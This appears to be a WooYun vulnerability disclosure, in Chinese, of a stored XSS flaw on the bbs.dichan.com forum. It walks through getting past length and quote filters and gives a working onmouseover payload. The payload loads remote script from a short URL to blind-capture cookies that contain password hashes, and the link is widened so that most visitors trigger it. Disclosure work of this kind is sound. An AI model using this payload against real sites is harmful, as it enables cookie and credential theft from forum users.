WooYun.org

主要share一下成功插入js的征途
前言
poc地址，鼠标移动到分享处，登陆状态下盲打到cookie里是有密码的md5的
alert :

http://bbs.dichan.com/tie-1412-1.html

加载js ：

http://bbs.dichan.com/tie-2111364-4.html

审核请您仔细点
1、jQuery.getScript
首先由于长度限制，过滤单引号
用jQuery.getScript（$对象已经被覆盖了）加载js，js地址用fromCharCode，但是总是多出几个字符。
找了好几个shorturl平台，最后找了最短的//ww.tl/_- 刚好能用。
出乎意外的是getScript函数会在路径后加上随机数如图，就变成notfound了

测试发现大多数shoturl产生的url用getScript都是not found
2、fuzz short url
能不能在我的short url //ww.tl/_- 后边加上一个无效字符，利用web语言的一些特性把getScript 后边的随机数?_=1421296220327 截掉呢？
fuzz试试

然后输出可以截断的ascii

然后把fromCharCode 最后添加任意一个fuzz出的ascii。
但是还是不行，调试窗口网络请求都url编码了。
3、哪里还能更短呢？
short url以我的资源是不可能更短了
那loader 函数呢？能否更短呢？js代码量一定大于jQuery，有没有其他函数呢？内置的
把论坛网页保存起来找一下

找到一个loadScript函数，分析一下是替换script标签的，窃喜
那么成功构造出一个我水平范围内的最短的

"onmouseover=loadscript("//ww.tl/_-","scriptpopular")>"

4、触发最大化
触发在一个链接上，思路是让链接占满整个横屏，那么浏览帖子的人，一旦滚动范围大就触发
如下 图分享处是出发点，占整个宽度的80%

这时候的dom是

盲打到的数据